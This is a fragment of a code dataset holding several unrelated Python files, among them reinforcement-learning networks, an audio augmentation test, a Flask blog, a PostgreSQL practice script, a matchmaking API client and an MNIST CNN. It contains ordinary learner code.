# self.a_func = nn.LeakyReLU()\n\n for mod in self.modules():\n if isinstance(mod, nn.Linear):\n torch.nn.init.xavier_uniform_(mod.weight)\n\n def forward(self, state):\n y = self.a_func(self.fc1(state))\n value = self.a_func(self.fc_value(y))\n adv = self.a_func(self.fc_adv(y))\n value = self.value(value)\n adv = self.adv(adv)\n\n adv_average = torch.mean(adv, dim=1, keepdim=True)\n Q = value + adv - adv_average\n\n return Q\n\n\nclass Duel_Q_Network_comp(nn.Module):\n def __init__(self):\n super(Duel_Q_Network_comp, self).__init__()\n\n self.fc1 = nn.Linear(37, 43)\n\n self.fc21 = nn.Linear(43, 13)\n self.fc22 = nn.Linear(43, 13)\n self.fc23 = nn.Linear(43, 13)\n self.fc24 = nn.Linear(43, 13)\n self.fc25 = nn.Linear(43, 13)\n\n self.fc31 = nn.Linear(13, 1)\n self.fc32 = nn.Linear(13, 1)\n self.fc33 = nn.Linear(13, 1)\n self.fc34 = nn.Linear(13, 1)\n self.fc35 = nn.Linear(13, 1)\n\n self.fc41 = nn.Linear(1, 5)\n self.fc42 = nn.Linear(1, 5)\n self.fc43 = nn.Linear(1, 5)\n self.fc44 = nn.Linear(1, 5)\n self.fc45 = nn.Linear(1, 5)\n\n\n #self.a_func = nn.Sigmoid()\n #self.a_func = nn.LeakyReLU()\n self.a_func = nn.Tanh()\n\n for mod in self.modules():\n if isinstance(mod, nn.Linear):\n torch.nn.init.xavier_uniform_(mod.weight)\n\n def forward(self, state):\n y = self.a_func(self.fc1(state))\n\n y1 = self.a_func(self.fc21(y))\n y2 = self.a_func(self.fc22(y))\n y3 = self.a_func(self.fc23(y))\n y4 = self.a_func(self.fc24(y))\n y5 = self.a_func(self.fc25(y))\n\n y1 = self.a_func(self.fc31(y1))\n y2 = self.a_func(self.fc32(y2))\n y3 = self.a_func(self.fc33(y3))\n y4 = self.a_func(self.fc34(y4))\n y5 = self.a_func(self.fc35(y5))\n\n y1 = self.fc41(y1)\n y2 = self.fc42(y2)\n y3 = self.fc43(y3)\n y4 = self.fc44(y4)\n y5 = self.fc45(y5)\n\n y = y1 + y2 + y3 + y4 + y5\n\n y_ave = torch.mean(y, dim=1, keepdim=True)\n Q = y - y_ave\n\n return Q","sub_path":"myTeam_RL_dueling.py","file_name":"myTeam_RL_dueling.py","file_ext":"py","file_size_in_byte":34744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"357032179","text":"import unittest\n\nimport numpy as np\n\nfrom audiomentations.augmentations.transforms import FrequencyMask\nfrom audiomentations.core.composition import Compose\n\n\nclass TestFrequencyMask(unittest.TestCase):\n def test_apply_frequency_mask(self):\n sample_len = 1024\n samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)\n sample_rate = 16000\n augmenter = Compose(\n [FrequencyMask(min_frequency_band=0.3, max_frequency_band=0.5, p=1.0)]\n )\n\n samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)\n self.assertEqual(samples_out.dtype, np.float32)\n self.assertEqual(len(samples_out), sample_len)\n\n std_in = np.mean(np.abs(samples_in))\n std_out = np.mean(np.abs(samples_out))\n self.assertLess(std_out, std_in)\n","sub_path":"tests/test_frequency_mask.py","file_name":"test_frequency_mask.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"465583000","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n strTemp = ''\n for x in range(len(s)):\n if x == 0:\n strTemp = s[0:x + 1]\n else:\n # print(strTemp)\n # print(s[x:len(strTemp) + x])\n if strTemp == s[x:len(strTemp) + x]:\n break\n else:\n strTemp = s[0:x + 1] \n return len(strTemp)\n\nif __name__ == '__main__':\n s = 'bbbb'\n print(Solution().lengthOfLongestSubstring(s))","sub_path":"leetcode/3.longest_substring_wo_repeating.1.py","file_name":"3.longest_substring_wo_repeating.1.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"547853775","text":"from datetime import date\nfrom flask import (Blueprint, request,\n render_template, redirect, url_for, flash, abort)\nfrom forms import PostForm, TagForm\nfrom models import Post, Tag\nfrom database import db\nfrom slugify import slugify\n\nposts_view = Blueprint('posts', __name__, url_prefix='/posts',\n template_folder='templates')\ntags_view = Blueprint('tags', __name__, url_prefix='/tags',\n template_folder='templates')\n\n\ndef prepare_tags_for_post(tags):\n if tags is not None:\n tags_in_db = [tag.tag_name for tag in Tag.query]\n for new_tag in tags:\n if new_tag not in tags_in_db:\n db.session.add(Tag(tag_name=new_tag))\n db.session.commit()\n return Tag.query.filter(Tag.tag_name.in_(tags)).all()\n\n\n@posts_view.route('/')\ndef show_posts():\n def select_tags(id):\n return ','.join(\n [tag.tag_name for tag in Post.query.filter(\n Post.id == id).first().tags])\n posts = Post.query.order_by(Post.date_created)\n flash('I\\am showing you all posts!')\n return render_template('posts.txt', posts=posts, select_tags=select_tags)\n\n\n@posts_view.route('/visible/')\ndef show_visible():\n def select_tags(id):\n return ','.join(\n [tag.tag_name for tag in Post.query.filter(\n Post.id == id).first().tags])\n posts = Post.query.filter(Post.is_visible == 1).order_by(Post.date_created)\n flash('I\\am showing you only visible posts!')\n return render_template('posts.txt', posts=posts,\n select_tags=select_tags)\n\n\n@posts_view.route('/create/', methods=['GET', 'POST'])\ndef create_post():\n if request.method == 'POST':\n print(request.form)\n form = PostForm(request.form)\n if form.validate():\n slug = slugify('{title} {date}'.format(\n title=form.title.data, date=date.today()))\n post = Post(user_id=form.user_id.data,\n title=form.title.data,\n content=form.content.data,\n is_visible=form.is_visible.data,\n slugfield=slug,\n )\n tag = form.tags.data\n post.tags.extend(prepare_tags_for_post(tag))\n db.session.add(post)\n db.session.commit()\n flash('Post created!')\n else:\n flash('Form is not valid! Post was not created.')\n flash(str(form.errors))\n return redirect(url_for('posts.show_posts'))\n\n\n@posts_view.route('/slug/')\ndef show_post_by_slug(slug):\n def select_tags(id):\n return ','.join(\n [tag.tag_name for tag in Post.query.filter(\n Post.id == id).first().tags])\n post = Post.query.filter(Post.slugfield == slug)\n print(post.first())\n if post.first() is not None:\n flash('I\\am showing you post by slugfield!')\n return render_template('posts.txt', posts=post,\n select_tags=select_tags)\n else:\n abort(404)\n\n\n@tags_view.route('/')\ndef show_tags():\n tags = Tag.query\n return render_template('tags.txt', tags=tags)\n\n\n@tags_view.route('/create/', methods=['GET', 'POST'])\ndef create_tag():\n if request.method == 'POST':\n print(request.form)\n form = TagForm(request.form)\n if form.validate():\n tag = Tag(tag_name=form.tag_name.data)\n db.session.add(tag)\n db.session.commit()\n flash('Tag created!')\n else:\n flash('Form is not valid! Tag was not created.')\n flash(str(form.errors))\n return redirect(url_for('tags.show_tags'))\n","sub_path":"flask_blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"180770753","text":"import os\nfrom dotenv import load_dotenv\nimport psycopg2\n\nload_dotenv()\n\nDB_NAME= os.getenv('DB_NAME', default='OOPS')\nDB_USER= os.getenv('DB_USER', default='OOPS')\nDB_PW = os.getenv('DB_PW', default='OOPS')\nDB_HOST= os.getenv('DB_HOST', default='OOPS')\n\n\n# print(DB_NAME)\n# print(DB_USER)\n# print(DB_PW)\n# print(DB_HOST)\n\n# exit()\n\n\n### Connect to ElephantSQL-hosted PostgreSQL\nconnection = psycopg2.connect(dbname=DB_NAME, user=DB_USER, password=DB_PW, host=DB_HOST)\nprint(type(connection))\n\n### A \"cursor\", a structure to iterate over db records to perform queries\ncursor = connection.cursor()\nprint(type(cursor))\n\n### An example query\ncursor.execute('SELECT * from test_table;')\n\n### Note - nothing happened yet! We need to actually *fetch* from the cursor\n# results = cursor.fetchall()\n# for row in results:\n# print(type(row), row)\n\n\n\n### Inserting data ###\n\nmy_dict = { \"a\": 1, \"b\": [\"dog\", \"cat\", 42], \"c\": 'true' }\n\n\n# insertion_query = f\"INSERT INTO test_table (name, data) VALUES (%s, %s)\"\n# cursor.execute(insertion_query,\n# ('A rowwwww', 'null')\n# )\n# cursor.execute(insertion_query,\n# ('Another row, with JSONNNNN', json.dumps(my_dict)) # converting dictionary to string\n# )\n\nexit()\n\n# h/t: https://stackoverflow.com/questions/8134602/psycopg2-insert-multiple-rows-with-one-query\ninsertion_query = f\"INSERT INTO test_table (name, data) VALUES %s\"\nexecute_values(cursor, insertion_query, [\n ('A rowwwww', 'null'),\n ('Another row, with JSONNNNN', json.dumps(my_dict)),\n ('Third row', \"3\")\n])\n\ndf = pd.DataFrame([\n ['A rowwwww', 'null'],\n ['Another row, with JSONNNNN', json.dumps(my_dict)],\n ['Third row', \"null\"],\n [\"Pandas Row\", \"null\"]\n])\n\nrecords = df.to_dict(\"records\") #> [{0: 'A rowwwww', 1: 'null'}, {0: 'Another row, with JSONNNNN', 1: '{\"a\": 1, \"b\": [\"dog\", \"cat\", 42], \"c\": \"true\"}'}, {0: 'Third row', 1: '3'}, {0: 'Pandas Row', 1: 'YOOO!'}]\nlist_of_tuples = [(r[0], r[1]) for r in records]\n\nexecute_values(cursor, insertion_query, list_of_tuples)\n\n#\n# QUERY THE TABLE\n#\n\nprint(\"-------------------\")\nquery = f\"SELECT * FROM {table_name};\"\nprint(\"SQL:\", query)\ncursor.execute(query)\nfor row in cursor.fetchall():\n print(row)\n\n# ACTUALLY SAVE THE TRANSACTIONS\nconnection.commit()\n\ncursor.close()\nconnection.close()","sub_path":"module2-sql-for-analysis/inclass/elephant_queries.py","file_name":"elephant_queries.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"232289064","text":"import requests\n\nx_auth_token = \"395e027902beeba119a06c67c14f9a97\"\nhost = \"https://huqeyhi95c.execute-api.ap-northeast-2.amazonaws.com/prod\"\n\nplayer_cnt = 30\n\ndef start():\n res = requests.post(host+\"/start\", headers={\"X-Auth-Token\":x_auth_token}, json={\"problem\":1}).json()\n return res[\"auth_key\"]\n\ndef getWaitingLine(auth_key): # 현재 대기열에서 매칭을 대기 중인 유저들의 정보를 반환한다. { \"id\": 1, \"from\": 3 }\n res = requests.get(host+\"/waiting_line\",headers={\"Authorization\":auth_key}).json()\n return res\n\ndef getGameResult(auth_key): # 이번 턴에 게임이 끝난 유저들의 게임 결과를 반환한다. {\"win\": 10, \"lose\": 2, \"taken\": 7 },\n res = requests.get(host+\"/game_result\",headers={\"Authorization\":auth_key}).json()\n return res\n\ndef getUserInfo(auth_key): # 모든 유저들의 현재 등급을 반환한다. { \"id\": 1, \"grade\": 2100 },\n res = requests.get(host+\"/user_info\",headers={\"Authorization\":auth_key}).json()\n return res\n\ndef putMatch(auth_key,pairs):\n res = requests.put(host+\"/match\",headers={\"Authorization\":auth_key},json={\"pairs\":pairs}).json()\n return res\n\ndef putChangeGrade(auth_key,cmds):\n res = requests.put(host+\"/change_grade\",headers={\"Authorization\":auth_key},json={\"commands\":cmds}).json()\n return res\n\ndef getScore(auth_key):\n res = requests.get(host+\"/score\",headers={\"Authorization\":auth_key}).json()\n return res\n\ndef calcMMR(time): # 40분 게임 시 서로 mmr 25증감 3분 게임 시 서로 50증감 \n return (-1.35*time + 104)/2\n\ndef setWaitingTier(lines, mmrs):\n tmp = {}\n for line in lines:\n mmr = mmrs[line[\"id\"]]\n tmp[(mmr//100)*100] = tmp.get((mmr//100)*100,[]) + [line[\"id\"]]\n return tmp\n\ndef setMatching(lines, mmrs, players_tiers):\n pairs = []\n\n matched = {}\n for line in lines:\n if not matched.get(line[\"id\"],False):\n mmr = (mmrs[line[\"id\"]]//100)*100\n\n opponent_id = -1\n \n for i in range(3):\n if opponent_id != -1:\n break\n if line[\"from\"] >= 4*i:\n can_match_list = set([])\n can_match_list.update(players_tiers.get(mmr+100*i,[]))\n can_match_list.update(players_tiers.get(mmr-100*i,[]))\n\n can_match_list = sorted([(x,abs(mmrs[line[\"id\"]]-mmrs[x])) for x in can_match_list],key=lambda x:x[1])\n\n for player_id in can_match_list:\n if line[\"id\"] != player_id[0]:\n opponent_id = player_id[0]\n break \n\n if opponent_id != -1:\n pair = [line[\"id\"], opponent_id]\n pairs.append(pair) \n players_tiers = removePlayerFromTierList(pair,mmrs,players_tiers)\n matched[pair[0]] = True\n matched[pair[1]] = True\n return pairs\n\ndef removePlayerFromTierList(player_ids, mmrs, players_tiers):\n \n for player_id in player_ids:\n mmr = (mmrs[player_id]//100)*100\n players_tiers[mmr].remove(player_id)\n return players_tiers\n\ndef checkGameResult(results, mmrs):\n for result in results:\n winner = result[\"win\"]\n loser = result[\"lose\"]\n taken = result[\"taken\"]\n\n mmrs[winner] += calcMMR(taken)\n mmrs[loser] += -calcMMR(taken)\n return mmrs\n\ndef sol1():\n auth_key = start()\n print(auth_key)\n\n print(getWaitingLine(auth_key))\n print(getGameResult(auth_key))\n print(getUserInfo(auth_key))\n\n player_mmrs = [1950 for x in range(player_cnt+1)] \n \n putMatch(auth_key,[])\n\n for i in range(594):\n # result 체크해서 mmr 체크하기\n game_results = getGameResult(auth_key)[\"game_result\"]\n player_mmrs = checkGameResult(game_results, player_mmrs)\n\n # 각 waiting line으로 \n lines = getWaitingLine(auth_key)[\"waiting_line\"]\n waiting_player_tier = setWaitingTier(lines, player_mmrs)\n\n pairs = setMatching(lines, player_mmrs, waiting_player_tier)\n \n print(putMatch(auth_key,pairs))\n\n player_with_mmr = []\n for idx, mmr in enumerate(player_mmrs[1:], start = 1):\n player_with_mmr.append((idx,mmr))\n\n player_with_mmr.sort(key=lambda x:x[1])\n grades_with_player_id = [{\"id\":x[0],\"grade\":idx} for idx,x in enumerate(player_with_mmr)] \n\n print(putChangeGrade(auth_key, grades_with_player_id))\n print(putMatch(auth_key,[]))\n print(getScore(auth_key))\n\n return 1\n\n\nsol1()","sub_path":"카카오2차 시험/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"408010524","text":"import numpy as np\nimport pandas as pd \nimport tensorflow as tf\nfrom tensorflow.contrib import rnn\nimport matplotlib.pyplot as plt\nfrom sklearn.utils import shuffle\nimport time\n\nimport os\nprint(os.listdir(\"../input\"))\n\n#首先读取train文件,并保存为df_train数据框,进行描述性统计\ndf_train = pd.read_csv(\"../input/train.csv\")\ndf_train.describe()\n\n#然后读取train文件,并保存为df_test数据框,并进行描述性统计\ndf_test = pd.read_csv(\"../input/test.csv\")\ndf_test.describe()\n\n#制作训练集,验证集和测试集\n#首先将数据按行随机打乱,然后进行切分,效果和train_test_split函数一样\n#注意要先进行打乱,再将X,Y分开,保证数据和标签一一对应\ndf_train = shuffle(df_train,random_state = 42) \n#用values可以讲数据框转换成不含有列名只含有内容的多维数组\ntrainXYorig = df_train.values\n#获取数据的行数\nm = trainXYorig.shape[0]\n#确定切分点,这里取行数的80%\npartition = int(m * 0.8)\n#将除开第一列标签的部分选取为列名,并且reshape成为四维数组,第一个维度是-1,代表的是样本数可以是任意张图片\ntrainXorig = trainXYorig[:, 1:].reshape(-1, 28, 28, 1) #注意reshape是函数,因此接的是小括号\n#归一化\ntrainX = trainXorig / 255 \n#制作X的训练集和验证集,注意要先定义devX,否则trainX名字会更新,导致devX无法正常获取数据\ndevX = trainX[partition: , :, :, :]\ntrainX = trainX[0: partition, :, :, :]\n\n#取大矩阵的第一列为原始标签Y\ntrainYorig = trainXYorig[:, 0]\n#注意!!!将Y的标签从数字类别转化成独热向量,方便后面计算交叉熵,取10阶单位矩阵的第标签行作为新标签矩阵中对应的一行\ntrainY = np.eye(10)[trainYorig, :] \n#制作Y的训练集和验证集,同样的切分\ndevY = trainY[partition: , :]\ntrainY = trainY[0: partition, :]\n\n#测试集也要进行reshape\ntestXorig = df_test.values.reshape(-1, 28, 28, 1)\n#归一化\ntestX = testXorig / 255\n\n#输出各个数据集合的维数,查验是否出错\nprint(\"训练集X的形状是{} \".format(trainX.shape))\nprint(\"训练集Y的形状是{} \".format(trainY.shape))\nprint(\"验证集X的��状是{} \".format(devX.shape))\nprint(\"验证集Y的形状是{} \".format(devY.shape))\nprint(\"测试集X的形状是{} \".format(testX.shape))\n\n#画出一张图片,先选我们要花的第index张图片\nplt.figure()\nindex = 102\n#调用imshow的API,画出第index个样本的所有行,所有列,和第一个channel,cmap参数定义的是图片颜色,3channel图片无法定义cmap, interpolation可以定义缺失值插值方法(此处未用到)\nplt.imshow(trainX[index, :, :, 0], cmap ='gray')\n#给图片一个标题\nplt.title(\"No.{} picture,the label is {}\".format(index,trainYorig[index])) #标题中如果有中文无法正常显示?\nplt.show()\n\n#设置一个随机小批量梯度下降用的生成mini_batch的函数\ndef random_mini_batches(X, Y, mini_batch_size = 64, seed = 0):\n #先获得输入数据的总行数\n m = X.shape[0] \n #定义一个空的mini-batch的list,用来放所有的mini_batch\n mini_batches = []\n #设置随机数种子\n np.random.seed(seed)\n \n #permutation和shuffle类似,都是随机打乱,区别是permutation是返回一个被打乱的序列,原序列不变,shuffle直接改变原序列\n #如果permutation的变量用的是一个integer,那么会直接打乱np.arange(m),如下所示,会得到一个乱序的值为0~m-1的list\n permutation = list(np.random.permutation(m))\n #得到一个打乱的X和Y,维数索引是前面的被打乱的m\n shuffled_X = X[permutation,:,:,:]\n shuffled_Y = Y[permutation,:]\n \n #计算mini_batch的个数,mini_batch_size是函数里面给出的,int函数取整是取整数部分舍弃小数部分\n num_complete_minibatches = int(m / mini_batch_size) \n #对整个被打乱的X切片处理,并循环操作,得到一个很多mini_batch\n for k in range(0, num_complete_minibatches):\n mini_batch_X = shuffled_X[k * mini_batch_size: (k + 1) * mini_batch_size, :, :, :]\n mini_batch_Y = shuffled_Y[k * mini_batch_size: (k + 1) * mini_batch_size, :]\n #每一个小batch都由打乱的X,Y拼成一个tuple\n mini_batch = (mini_batch_X, mini_batch_Y)\n #组合所有的小batch,最后的mini_batches是列表嵌套元祖嵌套列表\n mini_batches.append(mini_batch)\n \n #如果总的样本数不能被mini_batch的个数整除,将剩余的样本也补充进来\n if (m % mini_batch_size != 0):\n mini_batch_X = shuffled_X[num_complete_minibatches * mini_batch_size: m, :, :, :]\n mini_batch_Y = shuffled_Y[num_complete_minibatches * mini_batch_size: m, :]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n \n #最后返回的是mini_batches的组合\n return mini_batches\n \n# 定义X,Y两个占位符\nX = tf.placeholder(dtype=tf.float32, shape=[None, 28, 28, 1], name = \"X\")\nY = tf.placeholder(dtype=tf.float32, shape=[None, 10], name = \"Y\")\n#定义一个布尔型变量的占位符,用来确定是不是在计算图需要训练的部分。\n#一张计算图里面根据你要fetch的值的不同,有些部分是不参与训练的。batch_norm层里面需要用到这个参数。对输出的均值和方差有影响。\nis_training = tf.placeholder(tf.bool) \n#打印出来,确认X,Y的类型和维度是否正确\nprint(\"X = \" + str(X))\nprint(\"Y = \" + str(Y))\n\n# 定义W1,W2,W3三个参数,也就是卷积核;get_variable 和 variable 类似,有则调用,无则新建\n# leNet-5 只有两层卷积层,这里定义了三层,扩大了网络规模\n# 初始化方法采用的是泽维尔初始化,这种方法的好处是可以使得每层输出的方差大致相等,使得信息能够在网络中更好的流动,具体方法是在某个均匀分布中实现初始化\n#卷积核的前两个维度是单层卷积核的维度,也就是它的长和宽,第三个维度是上一层的channel的个数,第三个维度是卷积核总共的层数\nW1 = tf.get_variable(\"W1\", shape=[3, 3, 1, 4], initializer=tf.contrib.layers.xavier_initializer()) #每个卷积核都要定义名字,形状和初始化方法\nW2 = tf.get_variable(\"W2\", shape=[3, 3, 4, 8], initializer=tf.contrib.layers.xavier_initializer())\nW3 = tf.get_variable(\"W3\", shape=[3, 3, 8, 8], initializer=tf.contrib.layers.xavier_initializer()) \n\n# 定义第一层网络结构,架构是:卷积运算 CONV2D(Z1) -> 批标准化 BatchNorm(N1) -> 激活函数 RELU(A1) -> 最大池化层 MAXPOOL(P1) -> \nZ1 = tf.nn.conv2d(input=X, filter=W1, strides=[1, 1, 1, 1], padding='SAME') #conv2d 在tf.nn模块,需要定义输入,卷积核,步长和padding。padding分为same padding和valid padding 两种\nN1 = tf.layers.batch_normalization(Z1, training=is_training) #批标准化在tf.layers模块!!!批标准化可以加速网络的计算\nA1 = tf.nn.relu(N1) #对上一层的结果取激活函数为relu:max{x,0}\n#至此,卷积部分定义完毕,接下来是池化\nP1 = tf.nn.max_pool(value=A1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\") #池化层也需要padding;池化层的尺寸和步长设置貌似和卷积核不一样?\n\n# 定义第二层网络结构,架构是:卷积运算 CONV2D(Z2) -> 批标准化 BatchNorm(N2) -> 激活函数 RELU(A2) -> 最大池化层 MAXPOOL(P1) -> \nZ2 = tf.nn.conv2d(input=P1, filter=W2, strides=[1, 1, 1, 1], padding='SAME')\nN2 = tf.layers.batch_normalization(Z2, training=is_training)\nA2 = tf.nn.relu(N2)\nP2 = tf.nn.max_pool(value=A2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n# 定义第三层网络结构,架构是:卷积运算 CONV2D(Z3) -> 批标准化 BatchNorm(N3) -> 激活函数 RELU(A3) -> 最大池化层 MAXPOOL(P1) -> \nZ3 = tf.nn.conv2d(input=P2, filter=W3, strides=[1, 1, 1, 1], padding='SAME')\nN3 = tf.layers.batch_normalization(Z3, training=is_training)\nA3 = tf.nn.relu(N3)\nP3 = tf.nn.max_pool(value=A3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n# 定义第四层网络结构,架构是:扁平化层 FLATTEN(F3) -> 全连接层 FULLYCONNECTED(Z4) -> 批标准化 BatchNorm(N4) -> 激活函数 RELU(A4)\nF3 = tf.contrib.layers.flatten(P3) #contrib模块包含的是有试验性质的新方法\nZ4 = tf.contrib.layers.fully_connected(F3, num_outputs=64, activation_fn=None) #总共要接两层全连接层,这是第一层,包含64个神经元,没有激活函数\nN4 = tf.layers.batch_normalization(Z4, training=is_training) #批标准化\nA4 = tf.nn.relu(N4)\n\n# 定义第五层网络结构,仅含有一个全连接层做softmax层,64 to 10\nZ5 = tf.contrib.layers.fully_connected(A4, num_outputs=10, activation_fn=None)\n\n# 代价函数,reducemean就是对某一个维度求平均,可以搭配axis使用,没有axis的话,就是对所有维度求平均。\n# 注意!!!以后不用with logits了,要用with logits v2\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=Z5, labels=Y))\n\n# 定义超参数\nlearning_rate = 0.002\nnum_epochs = 50\nmini_batch_size = 64\n# 初始化costs,为一个空列表\ncosts = []\n\n# 定义优化器\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n# 变量初始化,btw,所有的get_variable获得的参数都是放在global_variable池中的\ninit = tf.global_variables_initializer() \n\n# 开启新会话,并且初始化\nsess = tf.Session()\nsess.run(init)\n\n# 注意:由于我们使用的是tf.layers.batch_normalization()而不是tf.contrib.layers.batch_norm(), \n# 所以我们需要明确运行批量规范化所需的额外更新操作(sess.run([ training_op,extra_update_ops],...)。\nextra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\n# 第一层循环,从大周期epoch开始\nfor epoch in range(num_epochs):\n # random_mini_batches函数,返回的是由很多mini_batch组成的mini_batches的列表\n minibatches = random_mini_batches(trainX, trainY, mini_batch_size=mini_batch_size, seed=epoch + int(time.time()))\n # 初始化epochcost\n epoch_cost = 0.\n \n # 第二层循环,在minibatches列表内部循环\n for minibatch in minibatches:\n # 每个minibatch都是元组,这种赋值方法类似于minibatch[0],minibatch[1]\n (minibatchX, minibatchY) = minibatch\n # 不需要返回的值,可以赋值给空格;sess.run的参数,第一项是要fetch的值,第二项是feed_dict;计算上面定义的cost\n _, mini_batch_cost, __ = sess.run([optimizer, cost, extra_update_ops], feed_dict={X: minibatchX, Y: minibatchY, is_training:True})\n # 每一个epoch的cost等于所有mini_batch的cost相加\n epoch_cost += mini_batch_cost\n\n # 对epoch_cost 求平均\n epoch_cost /= len(minibatches)\n # 在costs列表 加上上一个epoch的cost\n costs.append(epoch_cost)\n # 如果 epoch是偶数(只输出一半的值)\n if epoch % 2 == 0:\n # 格式化输出,%d是数字,%f是浮点数\n print(\"No. %d epoch, cost = %f\" % (epoch, epoch_cost))\n \n# 用plt画随着epoch变化costs的曲线\nplt.plot(costs)\nplt.xlabel(\"number of epochs\")\nplt.ylabel(\"cost\")\nplt.title(\"cost\")\n\n# predict_op返回的是向量沿轴线方向的最大值的索引\npredict_op = tf.argmax(Z5, 1)\n# tf.equal 返回的是一个全是bool值变量的数组,相同返回True,不同返回False\ncorrect_prediction = tf.equal(predict_op, tf.argmax(Y, 1))\n# 将布尔型变化成浮点型,True为1,False为0.然后求平均,可以得到平均正确率\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\n# eval()也是启动计算的一种方式。基于Tensorflow的基本原理,首先需要定义图,然后计算图,其中计算图的函数常见的有run()函数,如sess.run()。同样eval()也是此类函数,是sess.run()的另外一种写法。\n# 计算训练集误差\n# is_training标记为False的时候不会执行dropout等操作。只有在优化参数的时候is_training = True. 注意is_training是放在feed_dict里面的。\ntrain_accuracy = accuracy.eval(session=sess, feed_dict={X: trainX, Y: trainY, is_training:False}) \n# 计算验证集误差\ndev_accuracy = accuracy.eval(session=sess, feed_dict={X: devX, Y: devY, is_training:False})\n# 输出\nprint(\"train_accuracy = \" + str(train_accuracy))\nprint(\"dev_accuracy = \" + str(dev_accuracy))\n\n# 计算测试集预测值\ntestY_pred = predict_op.eval(session=sess, feed_dict={X: testX, is_training:False})\n# 保存成一个一列dataframe,列标签是Label\ntestYDf = pd.DataFrame(testY_pred.reshape(-1, 1), index=np.arange(1, 1 + len(testY_pred)), columns=[\"Label\"]) # index 要求从 1 开始\n# 保存成csv\ntestYDf.to_csv(\"test_predict.csv\", index=True, index_label=\"ImageId\")\n","sub_path":"CNNfordigits.py","file_name":"CNNfordigits.py","file_ext":"py","file_size_in_byte":12952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"35287920","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom utils import build_hidden_layer\n\nclass ActorCritic(nn.Module):\n def __init__(self,state_size,action_size,shared_layers,\n critic_hidden_layers=[],actor_hidden_layers=[],\n seed=0, init_type=None):\n \"\"\"Initialize parameters and build policy.\n Params\n ======\n state_size (int): Dimension of each state\n action_size (int): Dimension of each action\n shared_layers (list(int)): Dimension of the shared hidden layers\n critic_hidden_layers (list(int)): Dimension of the critic's hidden layers\n actor_hidden_layers (list(int)): Dimension of the actor's hidden layers\n seed (int): Random seed\n init_type (str): Initialization type\n \"\"\"\n super(ActorCritic, self).__init__()\n self.init_type = init_type\n self.seed = torch.manual_seed(seed)\n self.sigma = nn.Parameter(torch.zeros(action_size))\n\n # Add shared hidden layer\n self.shared_layers = build_hidden_layer(input_dim=state_size,\n hidden_layers=shared_layers)\n\n # Add critic layers\n if critic_hidden_layers:\n # Add hidden layers for critic net if critic_hidden_layers is not empty\n self.critic_hidden = build_hidden_layer(input_dim=shared_layers[-1],\n hidden_layers=critic_hidden_layers)\n self.critic = nn.Linear(critic_hidden_layers[-1], 1)\n else:\n self.critic_hidden = None\n self.critic = nn.Linear(shared_layers[-1], 1)\n\n # Add actor layers\n if actor_hidden_layers:\n # Add hidden layers for actor net if actor_hidden_layers is not empty\n self.actor_hidden = build_hidden_layer(input_dim=shared_layers[-1],\n hidden_layers=actor_hidden_layers)\n self.actor = nn.Linear(actor_hidden_layers[-1], action_size)\n else:\n self.actor_hidden = None\n self.actor = nn.Linear(shared_layers[-1], action_size)\n\n # Apply Tanh() to bound the actions\n self.tanh = nn.Tanh()\n\n # Initialize hidden and actor-critic layers\n if self.init_type is not None:\n self.shared_layers.apply(self._initialize)\n self.critic.apply(self._initialize)\n self.actor.apply(self._initialize)\n if self.critic_hidden is not None:\n self.critic_hidden.apply(self._initialize)\n if self.actor_hidden is not None:\n self.actor_hidden.apply(self._initialize)\n\n def _initialize(self, n):\n \"\"\"Initialize network weights.\n \"\"\"\n if isinstance(n, nn.Linear):\n if self.init_type=='xavier-uniform':\n nn.init.xavier_uniform_(n.weight.data)\n elif self.init_type=='xavier-normal':\n nn.init.xavier_normal_(n.weight.data)\n elif self.init_type=='kaiming-uniform':\n nn.init.kaiming_uniform_(n.weight.data)\n elif self.init_type=='kaiming-normal':\n nn.init.kaiming_normal_(n.weight.data)\n elif self.init_type=='orthogonal':\n nn.init.orthogonal_(n.weight.data)\n elif self.init_type=='uniform':\n nn.init.uniform_(n.weight.data)\n elif self.init_type=='normal':\n nn.init.normal_(n.weight.data)\n else:\n raise KeyError('initialization type is not found in the set of existing types')\n\n def forward(self, state):\n \"\"\"Build a network that maps state -> (action, value).\"\"\"\n def apply_multi_layer(layers,x,f=F.leaky_relu):\n for layer in layers:\n x = f(layer(x))\n return x\n\n state = apply_multi_layer(self.shared_layers,state)\n\n v_hid = state\n if self.critic_hidden is not None:\n v_hid = apply_multi_layer(self.critic_hidden,v_hid)\n\n a_hid = state\n if self.actor_hidden is not None:\n a_hid = apply_multi_layer(self.actor_hidden,a_hid)\n\n a = self.tanh(self.actor(a_hid))\n value = self.critic(v_hid).squeeze(-1)\n return a, 